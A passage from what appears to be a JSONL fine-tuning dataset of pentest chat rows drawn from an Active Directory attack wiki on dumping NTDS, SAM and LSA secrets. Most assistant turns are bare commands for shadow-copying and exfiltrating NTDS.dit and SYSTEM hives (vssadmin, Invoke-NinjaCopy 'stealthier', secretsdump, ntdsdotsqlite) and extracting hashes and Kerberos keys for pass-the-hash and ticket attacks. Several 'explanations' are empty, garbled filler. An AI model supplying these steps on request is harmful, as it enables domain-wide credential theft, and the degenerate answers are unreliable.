of backup copies of files or volumes, even when they are in use. The following command will create the shadow copy and will print two values that will be used later: the ID and the Name of the shadow copy.\n\n``bash\nvssadmin create shadow /for=C:\n`\n\nOnce the VSS is created for the target drive, it is then possible to copy the target files from it.\n\n`bash\ncopy $ShadowCopyName\\Windows\\NTDS\\NTDS.dit C:\\Windows\\Temp\\ntds.dit.save\ncopy $ShadowCopyName\\Windows\\System32\\config\\SYSTEM C:\\Windows\\Temp\\system.save\n`\n\nOnce the required files are exfiltrated, the shadow copy can be removed\n\n`bash\nvssadmin delete shadows /shadow=$ShadowCopyId\n`\n\n> [!TIP]\n> This attack can be carried out with Impacket's secretsdump with the -use-vss option. Additionaly, the -exec-method option can be set to smbexec, wmiexec or mmcexec` to specify on which remote command execution method to rely on for the process.", "metadata": {"corpus_index": 340, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use vssadmin for ntds secrets - volume shadow copy (vssadmin)?"}, {"role": "assistant", "content": "vssadmin create shadow /for=C:"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use vssadmin for ntds secrets - volume shadow copy (vssadmin)?", "response": "vssadmin create shadow /for=C:", "metadata": {"corpus_index": 341, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "vssadmin"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on NTDS secrets - Volume Shadow Copy (VSSAdmin)"}, {"role": "assistant", "content": "vssadmin create shadow /for=C:"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on NTDS secrets - Volume Shadow Copy (VSSAdmin)", "response": "vssadmin create shadow /for=C:", "metadata": {"corpus_index": 341, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `vssadmin create shadow /for=C:`?"}, {"role": "assistant", "content": "This command is used for ntds secrets - volume shadow copy (vssadmin). Volume Shadow Copy (VSSAdmin)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `vssadmin create shadow /for=C:`?", "response": "This command is used for ntds secrets - volume shadow copy (vssadmin). Volume Shadow Copy (VSSAdmin)", "metadata": {"corpus_index": 341, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the copy command to ntds secrets - volume shadow copy (vssadmin)"}, {"role": "assistant", "content": "copy $ShadowCopyName\\Windows\\NTDS\\NTDS.dit C:\\Windows\\Temp\\ntds.dit.save\ncopy $ShadowCopyName\\Windows\\System32\\config\\SYSTEM C:\\Windows\\Temp\\system.save"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the copy command to ntds secrets - volume shadow copy (vssadmin)", "response": "copy $ShadowCopyName\\Windows\\NTDS\\NTDS.dit C:\\Windows\\Temp\\ntds.dit.save\ncopy $ShadowCopyName\\Windows\\System32\\config\\SYSTEM C:\\Windows\\Temp\\system.save", "metadata": {"corpus_index": 342, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "copy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through NTDS secrets - Volume Shadow Copy (VSSAdmin)"}, {"role": "assistant", "content": "copy $ShadowCopyName\\Windows\\NTDS\\NTDS.dit C:\\Windows\\Temp\\ntds.dit.save\ncopy $ShadowCopyName\\Windows\\System32\\config\\SYSTEM C:\\Windows\\Temp\\system.save"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through NTDS secrets - Volume Shadow Copy (VSSAdmin)", "response": "copy $ShadowCopyName\\Windows\\NTDS\\NTDS.dit C:\\Windows\\Temp\\ntds.dit.save\ncopy $ShadowCopyName\\Windows\\System32\\config\\SYSTEM C:\\Windows\\Temp\\system.save", "metadata": {"corpus_index": 342, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `copy $ShadowCopyName\\Windows\\NTDS\\NTDS.dit C:\\Windows\\Temp\\ntds.dit.save`?"}, {"role": "assistant", "content": "This command is used for ntds secrets - volume shadow copy (vssadmin). Volume Shadow Copy (VSSAdmin)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `copy $ShadowCopyName\\Windows\\NTDS\\NTDS.dit C:\\Windows\\Temp\\ntds.dit.save`?", "response": "This command is used for ntds secrets - volume shadow copy (vssadmin). Volume Shadow Copy (VSSAdmin)", "metadata": {"corpus_index": 342, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the vssadmin command to ntds secrets - volume shadow copy (vssadmin)"}, {"role": "assistant", "content": "vssadmin delete shadows /shadow=$ShadowCopyId"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the vssadmin command to ntds secrets - volume shadow copy (vssadmin)", "response": "vssadmin delete shadows /shadow=$ShadowCopyId", "metadata": {"corpus_index": 343, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "vssadmin"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for NTDS secrets - Volume Shadow Copy (VSSAdmin)"}, {"role": "assistant", "content": "vssadmin delete shadows /shadow=$ShadowCopyId"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for NTDS secrets - Volume Shadow Copy (VSSAdmin)", "response": "vssadmin delete shadows /shadow=$ShadowCopyId", "metadata": {"corpus_index": 343, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `vssadmin delete shadows /shadow=$ShadowCopyId`?"}, {"role": "assistant", "content": "This command is used for ntds secrets - volume shadow copy (vssadmin). Volume Shadow Copy (VSSAdmin)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `vssadmin delete shadows /shadow=$ShadowCopyId`?", "response": "This command is used for ntds secrets - volume shadow copy (vssadmin). Volume Shadow Copy (VSSAdmin)", "metadata": {"corpus_index": 343, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe NTDS secrets - NTFS structure parsing in the context of penetration testing"}, {"role": "assistant", "content": "Invoke-NinjaCopy is a PowerShell script part of the PowerSploit suite able to \"copy files off an NTFS volume by opening a read handle to the entire volume (such as c:) and parsing the NTFS structures. This technique is stealthier than the others.\n\n``bash\nInvoke-NinjaCopy.ps1 -Path \"C:\\Windows\\NTDS\\NTDS.dit\" -LocalDestination \"C:\\Windows\\Temp\\ntds.dit.save\"\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe NTDS secrets - NTFS structure parsing in the context of penetration testing", "response": "Invoke-NinjaCopy is a PowerShell script part of the PowerSploit suite able to \"copy files off an NTFS volume by opening a read handle to the entire volume (such as c:) and parsing the NTFS structures. This technique is stealthier than the others.\n\n``bash\nInvoke-NinjaCopy.ps1 -Path \"C:\\Windows\\NTDS\\NTDS.dit\" -LocalDestination \"C:\\Windows\\Temp\\ntds.dit.save\"\n``", "metadata": {"corpus_index": 344, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out NTDS secrets - NTFS structure parsing during a pentest?"}, {"role": "assistant", "content": "Invoke-NinjaCopy is a PowerShell script part of the PowerSploit suite able to \"copy files off an NTFS volume by opening a read handle to the entire volume (such as c:) and parsing the NTFS structures. This technique is stealthier than the others.\n\n``bash\nInvoke-NinjaCopy.ps1 -Path \"C:\\Windows\\NTDS\\NTDS.dit\" -LocalDestination \"C:\\Windows\\Temp\\ntds.dit.save\"\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out NTDS secrets - NTFS structure parsing during a pentest?", "response": "Invoke-NinjaCopy is a PowerShell script part of the PowerSploit suite able to \"copy files off an NTFS volume by opening a read handle to the entire volume (such as c:) and parsing the NTFS structures. This technique is stealthier than the others.\n\n``bash\nInvoke-NinjaCopy.ps1 -Path \"C:\\Windows\\NTDS\\NTDS.dit\" -LocalDestination \"C:\\Windows\\Temp\\ntds.dit.save\"\n``", "metadata": {"corpus_index": 344, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Invoke-NinjaCopy.ps1 command for ntds secrets - ntfs structure parsing"}, {"role": "assistant", "content": "Invoke-NinjaCopy.ps1 -Path \"C:\\Windows\\NTDS\\NTDS.dit\" -LocalDestination \"C:\\Windows\\Temp\\ntds.dit.save\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Invoke-NinjaCopy.ps1 command for ntds secrets - ntfs structure parsing", "response": "Invoke-NinjaCopy.ps1 -Path \"C:\\Windows\\NTDS\\NTDS.dit\" -LocalDestination \"C:\\Windows\\Temp\\ntds.dit.save\"", "metadata": {"corpus_index": 345, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Invoke-NinjaCopy.ps1"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on NTDS secrets - NTFS structure parsing"}, {"role": "assistant", "content": "Invoke-NinjaCopy.ps1 -Path \"C:\\Windows\\NTDS\\NTDS.dit\" -LocalDestination \"C:\\Windows\\Temp\\ntds.dit.save\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on NTDS secrets - NTFS structure parsing", "response": "Invoke-NinjaCopy.ps1 -Path \"C:\\Windows\\NTDS\\NTDS.dit\" -LocalDestination \"C:\\Windows\\Temp\\ntds.dit.save\"", "metadata": {"corpus_index": 345, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Invoke-NinjaCopy.ps1 -Path \"C:\\Windows\\NTDS\\NTDS.dit\" -LocalDestination \"C:\\Windows\\Temp\\ntds.dit.save\"`?"}, {"role": "assistant", "content": "This command is used for ntds secrets - ntfs structure parsing. NTFS structure parsing"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Invoke-NinjaCopy.ps1 -Path \"C:\\Windows\\NTDS\\NTDS.dit\" -LocalDestination \"C:\\Windows\\Temp\\ntds.dit.save\"`?", "response": "This command is used for ntds secrets - ntfs structure parsing. NTFS structure parsing", "metadata": {"corpus_index": 345, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain NTDS secrets - 2. Parsing"}, {"role": "assistant", "content": "Once the required files are exfiltrated, they can be parsed by tools like secretsdump (Python, part of Impacket) or gosecretsdump (Go, faster for big files).\n\n``bash\nsecretsdump -ntds ntds.dit.save -system system.save LOCAL\ngosecretsdump -ntds ntds.dit.save -system system.save\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain NTDS secrets - 2. Parsing", "response": "Once the required files are exfiltrated, they can be parsed by tools like secretsdump (Python, part of Impacket) or gosecretsdump (Go, faster for big files).\n\n``bash\nsecretsdump -ntds ntds.dit.save -system system.save LOCAL\ngosecretsdump -ntds ntds.dit.save -system system.save\n``", "metadata": {"corpus_index": 346, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do NTDS secrets - 2. Parsing"}, {"role": "assistant", "content": "Once the required files are exfiltrated, they can be parsed by tools like secretsdump (Python, part of Impacket) or gosecretsdump (Go, faster for big files).\n\n``bash\nsecretsdump -ntds ntds.dit.save -system system.save LOCAL\ngosecretsdump -ntds ntds.dit.save -system system.save\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do NTDS secrets - 2. Parsing", "response": "Once the required files are exfiltrated, they can be parsed by tools like secretsdump (Python, part of Impacket) or gosecretsdump (Go, faster for big files).\n\n``bash\nsecretsdump -ntds ntds.dit.save -system system.save LOCAL\ngosecretsdump -ntds ntds.dit.save -system system.save\n``", "metadata": {"corpus_index": 346, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the secretsdump command to ntds secrets - 2. parsing"}, {"role": "assistant", "content": "secretsdump -ntds ntds.dit.save -system system.save LOCAL\ngosecretsdump -ntds ntds.dit.save -system system.save"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the secretsdump command to ntds secrets - 2. parsing", "response": "secretsdump -ntds ntds.dit.save -system system.save LOCAL\ngosecretsdump -ntds ntds.dit.save -system system.save", "metadata": {"corpus_index": 347, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "secretsdump"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out NTDS secrets - 2. Parsing during a pentest?"}, {"role": "assistant", "content": "secretsdump -ntds ntds.dit.save -system system.save LOCAL\ngosecretsdump -ntds ntds.dit.save -system system.save"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out NTDS secrets - 2. Parsing during a pentest?", "response": "secretsdump -ntds ntds.dit.save -system system.save LOCAL\ngosecretsdump -ntds ntds.dit.save -system system.save", "metadata": {"corpus_index": 347, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `secretsdump -ntds ntds.dit.save -system system.save LOCAL`?"}, {"role": "assistant", "content": "This command is used for ntds secrets - 2. parsing. 2. Parsing"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `secretsdump -ntds ntds.dit.save -system system.save LOCAL`?", "response": "This command is used for ntds secrets - 2. parsing. 2. Parsing", "metadata": {"corpus_index": 347, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about NTDS secrets - NTDS Directory parsing and extraction"}, {"role": "assistant", "content": "With the required files, it is possible to extract more information than just secrets. The NTDS file is responsible for storing the entire directory, with users, groups, OUs, trusted domains etc... This data can be retrieved by parsing the NTDS with tools like ntdsdotsqlite. With the NTDS alone, objects can be extracted from the NTDS such as user and machine accounts, with a lot of information about them: descriptions, user account control flags, last logon and password change timestamps etc. This information is stored as an SQLite database which is easier to browse and query.\n\nWith the SYSTEM hive available it is able to extract credentials as well: NT and LM hashes, supplemental credentials such as kerberos keys, cleartext passwords and password hash history.\n\n``bash\nntdsdotsqlite ntds.dit -o ntds.sqlite\nntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about NTDS secrets - NTDS Directory parsing and extraction", "response": "With the required files, it is possible to extract more information than just secrets. The NTDS file is responsible for storing the entire directory, with users, groups, OUs, trusted domains etc... This data can be retrieved by parsing the NTDS with tools like ntdsdotsqlite. With the NTDS alone, objects can be extracted from the NTDS such as user and machine accounts, with a lot of information about them: descriptions, user account control flags, last logon and password change timestamps etc. This information is stored as an SQLite database which is easier to browse and query.\n\nWith the SYSTEM hive available it is able to extract credentials as well: NT and LM hashes, supplemental credentials such as kerberos keys, cleartext passwords and password hash history.\n\n``bash\nntdsdotsqlite ntds.dit -o ntds.sqlite\nntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive\n``", "metadata": {"corpus_index": 348, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do NTDS secrets - NTDS Directory parsing and extraction"}, {"role": "assistant", "content": "With the required files, it is possible to extract more information than just secrets. The NTDS file is responsible for storing the entire directory, with users, groups, OUs, trusted domains etc... This data can be retrieved by parsing the NTDS with tools like ntdsdotsqlite. With the NTDS alone, objects can be extracted from the NTDS such as user and machine accounts, with a lot of information about them: descriptions, user account control flags, last logon and password change timestamps etc. This information is stored as an SQLite database which is easier to browse and query.\n\nWith the SYSTEM hive available it is able to extract credentials as well: NT and LM hashes, supplemental credentials such as kerberos keys, cleartext passwords and password hash history.\n\n``bash\nntdsdotsqlite ntds.dit -o ntds.sqlite\nntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do NTDS secrets - NTDS Directory parsing and extraction", "response": "With the required files, it is possible to extract more information than just secrets. The NTDS file is responsible for storing the entire directory, with users, groups, OUs, trusted domains etc... This data can be retrieved by parsing the NTDS with tools like ntdsdotsqlite. With the NTDS alone, objects can be extracted from the NTDS such as user and machine accounts, with a lot of information about them: descriptions, user account control flags, last logon and password change timestamps etc. This information is stored as an SQLite database which is easier to browse and query.\n\nWith the SYSTEM hive available it is able to extract credentials as well: NT and LM hashes, supplemental credentials such as kerberos keys, cleartext passwords and password hash history.\n\n``bash\nntdsdotsqlite ntds.dit -o ntds.sqlite\nntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive\n``", "metadata": {"corpus_index": 348, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the ntdsdotsqlite syntax for ntds secrets - ntds directory parsing and extraction?"}, {"role": "assistant", "content": "ntdsdotsqlite ntds.dit -o ntds.sqlite\nntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the ntdsdotsqlite syntax for ntds secrets - ntds directory parsing and extraction?", "response": "ntdsdotsqlite ntds.dit -o ntds.sqlite\nntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive", "metadata": {"corpus_index": 349, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ntdsdotsqlite"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute NTDS secrets - NTDS Directory parsing and extraction?"}, {"role": "assistant", "content": "ntdsdotsqlite ntds.dit -o ntds.sqlite\nntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute NTDS secrets - NTDS Directory parsing and extraction?", "response": "ntdsdotsqlite ntds.dit -o ntds.sqlite\nntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive", "metadata": {"corpus_index": 349, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ntdsdotsqlite ntds.dit -o ntds.sqlite`?"}, {"role": "assistant", "content": "This command is used for ntds secrets - ntds directory parsing and extraction. NTDS Directory parsing and extraction"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ntdsdotsqlite ntds.dit -o ntds.sqlite`?", "response": "This command is used for ntds secrets - ntds directory parsing and extraction. NTDS Directory parsing and extraction", "metadata": {"corpus_index": 349, "category": "credentials", "source_file": "docs/src/ad/movement/credentials/dumping/ntds.md", "page_title": "NTDS secrets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of SAM & LSA secrets - Theory"}, {"role": "assistant", "content": "In Windows environments, passwords are stored in a hashed format in registry hives like SAM (Security Account Manager) and SECURITY.\n\n| Hive | Details | Format or credential material |\n| -------- | -------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| SAM | stores locally cached credentials (referred to as SAM secrets) | LM or NT hashes |\n| SECURITY | stores domain cached credentials (referred to as LSA secrets) | Plaintext passwords, LM or NT hashes, Kerberos keys (DES, AES), Domain Cached Credentials (DCC1 and DCC2), Security Questions (L$SQSA), |\n| SYSTEM | contains enough info to decrypt SAM secrets and LSA secrets | N/A |\n\nSAM and LSA secrets can be dumped either locally or remotely from the mounted registry hives. These secrets can also be extracted offline from the exported hives. Once the secrets are extracted, they can be used for various attacks, depending on the credential format.\n\n| Credential material | Subsequent attacks |\n| ---------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| Plaintext passwords | credential spraying, stuffing, shuffling or silver tickets |\n| LM and NT hashes | credential spraying, stuffing, shuffling, cracking, pass-the-hash |\n| Kerberos keys (RC4, i.e. == NT hash) | credential cracking, overpass-the-hash or silver tickets |\n| Kerberos keys (DES, AES) | credential cracking, pass-the-key or silver tickets |\n| Domain Cached Credentials (DCC1 or DCC2) | credential cracking |"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of SAM & LSA secrets - Theory", "response": "In Windows environments, passwords are stored in a hashed format in registry hives like SAM (Security Account Manager) and SECURITY.\n\n| Hive | Details | Format or credential material |\n| -------- | -------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| SAM | stores locally cached credentials (referred to as SAM secrets) | LM or NT hashes |\n| SECURITY | stores domain cached credentials (referred to as LSA secrets) | Plaintext passwords, LM or NT hashes, Kerberos keys (DES, AES), Domain Cached Credentials (DCC1 and DCC2), Security Questions (L$SQSA), |\n| SYSTEM | contains enough info to decrypt SAM secrets and LSA secrets | N/A |\n\nSAM and LSA secrets can be dumped either locally or remotely from the mounted registry hives. These secrets can also be extracted offline from the exported hives. Once the secrets are extracted, they can be used for various attacks, depending on the credential format.\n\n| Credential material | Subsequent attacks |\n| ---------------------------------------- | 